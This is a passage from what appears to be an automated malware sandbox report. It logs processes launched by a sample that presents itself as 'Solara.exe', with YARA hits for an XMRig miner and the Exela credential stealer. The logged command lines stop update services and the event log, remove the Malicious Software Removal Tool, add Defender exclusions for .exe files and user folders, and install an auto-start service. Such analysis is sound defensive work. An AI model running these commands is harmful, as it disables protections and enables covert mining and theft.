                                                                                                  Has exited:true

                                                                                                  Target ID:15
                                                                                                  Start time:01:10:43
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:16
                                                                                                  Start time:01:10:43
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\wusa.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                  Imagebase:0x7ff6f90b0000
                                                                                                  File size:345'088 bytes
                                                                                                  MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:17
                                                                                                  Start time:01:10:43
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                  Imagebase:0x7ff686210000
                                                                                                  File size:72'192 bytes
                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:18
                                                                                                  Start time:01:10:43
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:19
                                                                                                  Start time:01:10:43
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                                                                  Imagebase:0x7ff686210000
                                                                                                  File size:72'192 bytes
                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:20
                                                                                                  Start time:01:10:43
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:01:10:43
Start date:12/01/2025
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\sc.exe stop bits
Imagebase:0x7ff686210000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:01:10:43
Start date:12/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:01:10:44
Start date:12/01/2025
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\sc.exe stop dosvc
Imagebase:0x7ff686210000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:01:10:44
Start date:12/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:01:10:44
Start date:12/01/2025
Path:C:\Windows\System32\powercfg.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Imagebase:0x7ff7b4d70000
File size:96'256 bytes
MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:01:10:44
Start date:12/01/2025
Path:C:\Windows\System32\powercfg.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Imagebase:0x7ff7b4d70000
File size:96'256 bytes
MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:01:10:45
Start date:12/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:01:10:45
Start date:12/01/2025
Path:C:\Windows\System32\powercfg.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Imagebase:0x7ff7b4d70000
File size:96'256 bytes
MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:01:10:45
Start date:12/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:30
Start time:01:10:45
Start date:12/01/2025
Path:C:\Windows\System32\powercfg.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Imagebase:0x7ff7b4d70000
File size:96'256 bytes
MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:31
Start time:01:10:45
Start date:12/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:32
Start time:01:10:45
Start date:12/01/2025
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\sc.exe delete "PGYNROQK"
Imagebase:0x7ff686210000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:33
Start time:01:10:45
Start date:12/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:34
Start time:01:10:45
Start date:12/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:35
Start time:01:10:45
Start date:12/01/2025
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\sc.exe create "PGYNROQK" binpath= "C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe" start= "auto"
Imagebase:0x7ff686210000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:36
Start time:01:10:45
Start date:12/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:37
Start time:01:10:45
Start date:12/01/2025
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\sc.exe stop eventlog
Imagebase:0x7ff686210000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:38
Start time:01:10:45
Start date:12/01/2025
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\sc.exe start "PGYNROQK"
Imagebase:0x7ff686210000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:39
Start time:01:10:45
Start date:12/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:40
Start time:01:10:45
Start date:12/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:41
Start time:01:10:45
Start date:12/01/2025
Path:C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe
Wow64 process (32bit):false
Commandline:C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe
Imagebase:0x7ff65d130000
File size:5'527'040 bytes
MD5 hash:089094590DF5698B03A7428A5864ED33
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 83%, ReversingLabs
Has exited:true

                                                                                                  Target ID:42
                                                                                                  Start time:01:10:45
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                  Imagebase:0x7ff741d30000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:43
                                                                                                  Start time:01:10:45
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:44
                                                                                                  Start time:01:10:48
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                  Imagebase:0x7ff6051e0000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:45
                                                                                                  Start time:01:10:48
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                  Imagebase:0x7ff686210000
                                                                                                  File size:72'192 bytes
                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:46
                                                                                                  Start time:01:10:48
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:47
                                                                                                  Start time:01:10:48
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7b4ee0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:48
                                                                                                  Start time:01:10:48
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\wusa.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                  Imagebase:0x7ff6f90b0000
                                                                                                  File size:345'088 bytes
                                                                                                  MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:49
                                                                                                  Start time:01:10:48
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                  Imagebase:0x7ff686210000
                                                                                                  File size:72'192 bytes
                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:50
                                                                                                  Start time:01:10:48
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:51
                                                                                                  Start time:01:10:48
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                                                                  Imagebase:0x7ff686210000
                                                                                                  File size:72'192 bytes
                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:52
                                                                                                  Start time:01:10:48
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:53
                                                                                                  Start time:01:10:48
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\sc.exe stop bits
                                                                                                  Imagebase:0x7ff686210000
                                                                                                  File size:72'192 bytes
                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:54
                                                                                                  Start time:01:10:48
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:55
                                                                                                  Start time:01:10:49
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                                                                  Imagebase:0x7ff686210000
                                                                                                  File size:72'192 bytes
                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:56
                                                                                                  Start time:01:10:49
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:57
                                                                                                  Start time:01:10:49
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                  Imagebase:0x7ff7b4d70000
                                                                                                  File size:96'256 bytes
                                                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:58
                                                                                                  Start time:01:10:49
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                  Imagebase:0x7ff7b4d70000
                                                                                                  File size:96'256 bytes
                                                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 59
Start time: 01:10:49
Start date: 12/01/2025
Path: C:\Windows\System32\powercfg.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Imagebase: 0x7ff7b4d70000
File size: 96'256 bytes
MD5 hash: 9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 60
Start time: 01:10:49
Start date: 12/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 61
Start time: 01:10:49
Start date: 12/01/2025
Path: C:\Windows\System32\powercfg.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Imagebase: 0x7ff7b4d70000
File size: 96'256 bytes
MD5 hash: 9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 62
Start time: 01:10:49
Start date: 12/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6bd830000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 63
Start time: 01:10:49
Start date: 12/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 64
Start time: 01:10:49
Start date: 12/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 65
Start time: 01:10:49
Start date: 12/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 66
Start time: 01:10:50
Start date: 12/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: conhost.exe
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000042.00000002.2596176431.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000042.00000002.2596176431.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited: false

Target ID: 67
Start time: 01:10:50
Start date: 12/01/2025
Path: C:\Users\user\AppData\Local\Temp\Solara.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Local\Temp\Solara.exe"
Imagebase: 0x7ff6284a0000
File size: 5'527'040 bytes
MD5 hash: 089094590DF5698B03A7428A5864ED33
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 68
Start time: 01:10:50
Start date: 12/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\Solara.exe" -Verb runAs
Imagebase: 0x7ff741d30000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 69
Start time: 01:10:50
Start date: 12/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 72
Start time: 01:10:53
Start date: 12/01/2025
Path: C:\Users\user\AppData\Local\Temp\Solara.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Local\Temp\Solara.exe"
Imagebase: 0x7ff6284a0000
File size: 5'527'040 bytes
MD5 hash: 089094590DF5698B03A7428A5864ED33
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 73
Start time: 01:10:53
Start date: 12/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase: 0x7ff741d30000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 74
Start time: 01:10:53
Start date: 12/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 75
Start time: 01:10:59
Start date: 12/01/2025
Path: C:\Users\user\AppData\Local\Temp\Solara.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Local\Temp\Solara.exe"
Imagebase: 0x7ff6284a0000
File size: 5'527'040 bytes
MD5 hash: 089094590DF5698B03A7428A5864ED33
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 76
Start time: 01:11:04
Start date: 12/01/2025
Path: C:\Users\user\AppData\Local\Temp\Exela.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user~1\AppData\Local\Temp\Exela.exe"
Imagebase: 0x7ff75ae90000
File size: 9'949'634 bytes
MD5 hash: 0615D49BE12C174704A3DAAD945F7B56
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 47%, ReversingLabs
Has exited: true

Target ID: 77
Start time: 01:11:05
Start date: 12/01/2025
Path: C:\Users\user\AppData\Local\Temp\Exela.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user~1\AppData\Local\Temp\Exela.exe"
Imagebase: 0x7ff75ae90000
File size: 9'949'634 bytes
MD5 hash: 0615D49BE12C174704A3DAAD945F7B56
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 0000004D.00000003.2068669850.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 0000004D.00000003.2070969941.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000004D.00000002.2093996201.0000019BB72E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 0000004D.00000003.2072039698.0000019BB5EE7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
